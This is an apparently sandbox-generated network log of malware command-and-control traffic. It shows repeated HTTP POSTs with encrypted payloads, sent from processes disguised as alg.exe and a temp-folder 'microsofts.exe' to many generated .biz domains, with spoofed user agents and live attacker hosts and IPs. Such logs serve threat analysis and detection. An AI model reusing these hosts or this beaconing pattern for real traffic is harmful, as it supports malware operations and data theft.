                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:57.218523026 CET828OUTData Raw: 51 84 c8 d3 e0 1b 72 c7 30 03 00 00 f0 f4 99 1f 0d 81 cc b5 a7 27 c0 a0 9d 4d e9 73 28 01 9b ec ce 21 5a 00 86 f2 28 54 be 3c 6a d0 92 39 79 14 bf d3 c7 8e 14 50 83 4f 06 c4 a5 c8 3f ea 24 12 04 cd e9 be e8 24 e1 c7 ba 46 09 ab 47 80 93 af 93 55
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Qr0'Ms(!Z(T<j9yPO?$$FGU$l9LS%pUqmqbO?,s8_&f-vYDICcW\b6+W7KT%<?u\V`s_psi{#v/dMW<Ei{"^<E{>=
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:58.682744980 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=36dbe52dfd4ae17ee4f0759031731550|173.254.250.76|1730822638|1730822638|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
79          192.168.2.5  59747        34.211.97.45    80                1492  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Nov 5, 2024 17:03:58.093278885 CET  344  OUT  POST /vne HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: esuzf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:58.093278885 CET  778  OUT  Data Raw: 00 34 cf 8b 1d ca 87 31 fe 02 00 00 73 98 31 38 1e 7d 63 e2 e7 fe 8f 69 61 b3 31 6a aa 94 54 fa 83 a4 66 92 83 d4 28 81 9b a4 89 e9 ce f6 5f 5a 0f a1 12 03 5d 6a 5e cd 17 4c 40 e0 a9 d9 fe 43 c4 6d f6 64 89 a4 7c 9c 18 b8 51 31 d8 49 b0 5a c2 b3
Data Ascii: 41s18}cia1jTf(_Z]j^L@Cmd|Q1IZ%AjUuC+lhg!y?ny;RyQD,MwV`;WJ}.XqpO>!O*jQ vB-:(C/|uFgSdPn~:/0v:5YR4
Nov 5, 2024 17:03:58.913218975 CET  413  IN  HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a5243742a59754affb0fd3c93758a3b0|173.254.250.76|1730822638|1730822638|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
80          192.168.2.5  59748        18.246.231.120  80                1816  C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp  Bytes transferred  Direction  Data
Nov 5, 2024 17:03:58.759187937 CET  342  OUT  POST /v HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vyome.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:03:58.759257078 CET  828  OUT  Data Raw: 90 68 68 81 de 01 59 bc 30 03 00 00 64 71 7b e3 2f 68 cd 37 5f 16 36 5f ca 94 73 7e 1f 06 79 e7 ac eb 8b bf dd 33 d9 94 db 36 76 05 f0 c0 37 07 cc 2b c0 08 6a 28 6d 68 06 9f 5b 80 c4 39 a2 b6 38 04 fa 4c 16 9f 66 71 47 52 af fd 20 aa c2 4a 4c 90
Data Ascii: hhY0dq{/h7_6_s~y36v7+j(mh[98LfqGR JLA:N^P7isRyw1-hO#FPl;B%F)mF@cm|qh}3/WA(]WPQoB">K;"s8fiC0D|q8"{V|M_gs<Ha}w
Nov 5, 2024 17:03:59.594988108 CET  413  IN  HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=cb6b4bbf63a549cf45db1916482981de|173.254.250.76|1730822639|1730822639|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
81          192.168.2.5  59749        3.94.10.34      80                1492  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Nov 5, 2024 17:03:59.258522034 CET  353  OUT  POST /mshapsve HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:59.258552074 CET  778  OUT  Data Raw: d8 7e 56 25 a7 81 45 af fe 02 00 00 13 5b 63 a2 36 a1 9a 1e ea f9 14 52 62 3f 74 59 71 97 8f 7b 7e 6a 81 5d 89 e2 99 d3 0d 0d 03 1a 78 4a 03 6e fd 14 12 07 b2 6b 61 49 d1 77 2c 4b 5a e9 07 69 a3 e5 c2 47 24 76 61 19 5a 64 61 13 fb a5 33 49 3b 76
Data Ascii: ~V%E[c6Rb?tYq{~j]xJnkaIw,KZiG$vaZda3I;vPHV;&Se"7M|1$ACSI?0KL=gcmd4|6:v}by;m^=5G?n\[VPks$6>C3s5}5
Nov 5, 2024 17:03:59.919799089 CET  417  IN  HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8064358995643f6c762507257adff1ff|173.254.250.76|1730822639|1730822639|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.5 | 59751 | 18.208.156.248 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:59.832312107 CET | 353 | OUT | POST /roupupjil HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yauexmxk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:03:59.832334042 CET | 828 | OUT | Data Raw: 48 81 04 e4 3b c0 41 7f 30 03 00 00 85 38 2b 55 b7 77 42 3d d7 0f f3 0b 02 20 ca 20 4d 74 ea 75 64 0b 41 2c b7 25 2d da 42 4f 8d 2b 89 f0 57 05 a6 d2 8c fe 72 8c d4 39 ab ce fc e6 bf 3d dd 95 ac 80 53 9c 4e 6c 54 eb 57 85 13 1f 5d 94 a4 c0 43 2f
Data Ascii: H;A08+UwB= MtudA,%-BO+Wr9=SNlTW]C//EDQ2oC_eZ-:Ig~F/7lA+4m[]@yc?f~kMpDm:[7aM!Q| +ofL 33nOH]$c31N_LCcGCm
Nov 5, 2024 17:04:00.505268097 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4d41f6f0af2fb88020ee76e4b44358d4|173.254.250.76|1730822640|1730822640|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.5 | 59752 | 18.246.231.120 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:00.242958069 CET | 348 | OUT | POST /pbcmr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qpnczch.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:04:00.242971897 CET | 778 | OUT | Data Raw: e2 e0 d6 56 1b af 41 ce fe 02 00 00 10 8a 55 cb d9 18 95 ab 1b 89 98 80 d9 6d c5 ae 0a 05 31 3d 5c b2 00 f6 58 be ad 4e 2c 22 9d f4 fe 7c 33 a9 d9 85 ce 42 1e 82 f7 ef 7b c0 d8 7b f3 14 57 ad 0a c9 06 49 31 b2 ac 5f 85 ae 81 b1 e0 c2 e2 10 5b 07
Data Ascii: VAUm1=\XN,"|3B{{WI1_[`w?yTxc'7(jR}}grE0ui#x4H7{LfO(5Y+7~{uuT,O^pxKB;`,V\V_5"T^isYA%]Awn}
Nov 5, 2024 17:04:01.078316927 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fe19a8f0323f663f372196f61d2c6568|173.254.250.76|1730822640|1730822640|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.5 | 59753 | 13.251.16.150 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:00.544456005 CET | 349 | OUT | POST /megjwol HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: iuzpxe.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:00.544485092 CET | 828 | OUT | Data Raw: b6 74 7b 95 e9 77 de 61 30 03 00 00 ed 4c 7a 4e 8c 80 6b 2c 3f 05 17 34 91 72 40 6e bf 43 46 f0 ed 89 ff e2 c3 72 06 e0 85 53 e5 b0 7b cb 8d 56 db 9d 20 09 e2 6e 56 c5 64 01 63 43 6a 15 6f 15 96 7f 7a 78 d5 c7 56 fe e2 7a 44 e1 2f 09 bb 76 2e 16
Data Ascii: t{wa0LzNk,?4r@nCFrS{V nVdcCjozxVzD/v.)I;g]bB-]L53[y!9_zkvPqE:),^C8Mo:x\_2Eus+zd;i86P6$5C?&oj` 8
Nov 5, 2024 17:04:01.988516092 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6b2a346cf8f6d837418f708b50956bd8|173.254.250.76|1730822641|1730822641|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.5 | 59754 | 3.254.94.185 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:01.323533058 CET | 354 | OUT | POST /usismcqqdljny HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: brsua.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:04:01.323553085 CET | 778 | OUT | Data Raw: ee 25 1c 51 92 a0 b8 96 fe 02 00 00 8b 1d bc 5a fc 2d 0e f7 c7 c0 9f f8 26 dd 28 8e a7 0c e9 23 9d 89 0d bc 49 dc 7f 85 3a 76 1e 3c fd 04 24 34 bc 45 e6 b9 6b 6a 8f 8d 43 5d d0 8a 01 2f 99 23 b2 6b bc 3d 9c 0c 6c 22 f1 90 ee be da 7b 1f f0 c4 e2
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: %QZ-&(#I:v<$4EkjC]/#k=l"{ch&%T8x_^1lx`us%z7*]cO{Cx{k6M$}I'WKmDya_qr&EfH{[-`Y~AW#>0:k3`
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.291873932 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=093b3098c5c0d56b188c543706934c56|173.254.250.76|1730822642|1730822642|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.5 | 59755 | 13.251.16.150 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:02.036928892 CET | 351 | OUT | POST /xjfegb HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: sxmiywsfv.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:04:02.036928892 CET | 828 | OUT | Data Raw: 05 65 61 c7 79 e7 83 aa 30 03 00 00 7d 49 f9 cf f8 75 be 80 48 ea d7 02 45 4b e6 62 33 50 ae ae 06 ff 76 60 a3 5a 47 a1 71 fc 82 33 0f 83 c5 95 9c d9 c5 e6 b2 27 fb ee b5 db 97 29 fd 66 6a c5 94 ef e8 39 8c 5f fc f9 73 eb 15 c2 98 ce 8a 28 85 6d
    Data Ascii: eay0}IuHEKb3Pv`ZGq3')fj9_s(m<JFhK11St+XB7Od|Ns<pTY:`<xW;=s[Gw.neGt|+SK?i(rtgu/%kyH~uS |yrp:
Nov 5, 2024 17:04:03.489908934 CET | 417 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:03 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=52bfb23bbad96c53429ce58a91cd37fb|173.254.250.76|1730822643|1730822643|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.5 | 59756 | 85.214.228.140 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:02.583544016 CET | 346 | OUT | POST /ls HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: dlynankz.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:04:02.583578110 CET | 778 | OUT | Data Raw: e0 99 82 f8 b4 1c 3c 40 fe 02 00 00 3d 9f 66 7e 25 c2 39 16 07 50 8f de d5 84 c1 0d 90 1b 8e 55 22 f9 e7 0f 5e 96 22 4e bf 27 9e f3 67 1b 6d d1 9a 9c 3b 64 2e 32 c2 ed 9b cf 00 79 e3 72 36 e3 95 b2 82 86 2f 17 03 a9 28 88 32 95 d7 46 0a e1 ed 64
    Data Ascii: <@=f~%9PU"^"N'gm;d.2yr6/(2FdeZv9"93&6wQ_(Zq54n/"ye`;%],[8+c68}`4#'e5h<1|xgSRnPyVc{K?1I ^>iw
Nov 5, 2024 17:04:03.450649023 CET | 166 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.27.2
    Date: Tue, 05 Nov 2024 16:04:03 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Keep-Alive: timeout=20
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.5 | 59757 | 34.211.97.45 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:03.530846119 CET | 352 | OUT | POST /gyyihnqs HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vrrazpdh.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:04:03.530874968 CET | 828 | OUT | Data Raw: a3 ba 6f 97 ba 31 1b 9d 30 03 00 00 42 a1 e9 da 81 4f fe 17 ed 2e 3f 09 bc 25 d6 1e 49 13 d6 8b ae 9f 21 14 0b e3 7c af cd 7a 82 2c 91 6b 93 0e 75 f6 01 ac 07 ba 43 8c df 9b 3e 9f ac 60 44 e5 60 1f 2a 03 42 c0 d4 30 99 61 f3 12 01 5e 82 ef a4 c1
    Data Ascii: o10BO.?%I!|z,kuC>`D`*B0a^5$09GbSm9IBF^|7]kNCZto|U-0GcX2EDFra=RoG}N5z%{&3y,b\'#USyh-pY
Nov 5, 2024 17:04:04.363642931 CET | 416 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:04:04 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=8fc85a84711b035a3bd3e03320872b8c|173.254.250.76|1730822644|1730822644|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
89          192.168.2.5  59758        47.129.31.212   80                1492  C:\Windows\System32\alg.exe

Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 17:04:03.707349062 CET  358  OUT  POST /obphwwtyxwxyphq HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: oflybfv.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Nov 5, 2024 17:04:03.707367897 CET  778  OUT  Data Raw: cd a0 1e b2 01 5e 19 64 fe 02 00 00 d1 e2 7f ad fe 81 ae e2 56 f7 ef 2d 31 d5 9b 4a 3a 31 86 dd a5 b8 be fe 64 93 6a ef cd 16 6a b3 60 67 b7 1b 6c 26 ff 41 5b c5 b6 4c c0 b3 d6 78 b9 d3 dd c7 b1 fb fb 39 d9 d6 b1 ce 4b de 54 4c c0 3c 3e 72 f7 0e
  Data Ascii: ^dV-1J:1djj`gl&A[Lx9KTL<>rU"OG}{Ja4JNE069n5Y*WLO8I_"Vzeggq<2g1SU0dEpR]CsH[[.l`^0(F=)NQRS^kVfSHh{
Nov 5, 2024 17:04:05.142234087 CET  415  IN   HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 05 Nov 2024 16:04:04 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=6965190167a1d93a06a112f8c0a71c17|173.254.250.76|1730822644|1730822644|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
90          192.168.2.5  59759        47.129.31.212   80                1816  C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 17:04:04.427057028 CET  354  OUT  POST /olsalbtppedg HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: ftxlah.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 828
Nov 5, 2024 17:04:04.427057028 CET  828  OUT  Data Raw: fc de a6 79 2c 7c 81 03 30 03 00 00 81 7b 6f 31 bc 3f e0 12 bc c0 d5 fa f9 42 8e 7c bf 16 5d 54 ae 87 a0 a9 87 18 b8 64 eb f6 fa 84 fc ec 11 e2 6c 60 c5 76 c2 27 c7 78 fc f6 1f 3d 6a 60 e1 53 54 1f 4c b9 08 d8 1f 8c a3 4e 16 d9 c6 1e c5 1b 80 b4
  Data Ascii: y,|0{o1?B|]Tdl`v'x=j`STLN'g7h,3'i6T5WW_o,lstul|zpx_=_9"(DD39aa%ZPZLj>vXZ#{o{'/JNVmdoT]W
Nov 5, 2024 17:04:05.847815037 CET  414  IN   HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 05 Nov 2024 16:04:05 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=785043b03717d5d3c8f0aabdaf89e7a9|173.254.250.76|1730822645|1730822645|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              91192.168.2.55976134.211.97.45801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.679887056 CET355OUTPOST /bwancadkaqtlbx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.679903030 CET778OUTData Raw: 68 2e cf 3f 65 41 b9 5d fe 02 00 00 77 60 92 9d d9 e7 a5 89 cc 9d a7 26 7b e1 07 77 a9 69 08 f6 8e 2d e7 ae 70 43 b1 ee 32 82 a7 a3 d6 6c 04 08 12 4b e3 c5 8d bc ba fe 24 07 eb 2a fb 17 b9 7e a6 16 56 b1 b8 21 67 f3 07 22 67 4e 12 05 0f e9 17 f4
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: h.?eA]w`&{wi-pC2lK$*~V!g"gN=a/k4\O8>wo)ov%;l\R,5x*ixKX=sd3@&td|xLD^J>jH }% ]i}@Rbg/
Nov 5, 2024 17:04:06.510561943 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9f5c94f42361fd15ce7f2abb6aec767f|173.254.250.76|1730822646|1730822646|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.5 | 59762 | 13.251.16.150 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:05.906404972 CET | 351 | OUT | POST /fanvkuxv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: typgfhb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:05.906457901 CET | 828 | OUT | Data Raw: 67 70 c3 b5 92 90 c3 d3 30 03 00 00 80 7d 87 db 8d 0b ec 60 75 b2 bb 22 fa 08 12 7d f9 a3 16 ea f3 b8 68 60 0b 56 25 42 5c a8 df 2a fd a8 33 6c e3 0e 12 37 95 74 23 04 f1 1e e1 2a f1 8b 99 fd 4a bb 39 79 b8 f9 7b 5b 4b 52 74 bd 1a 53 6d 95 64 c0
Nov 5, 2024 17:04:07.326438904 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
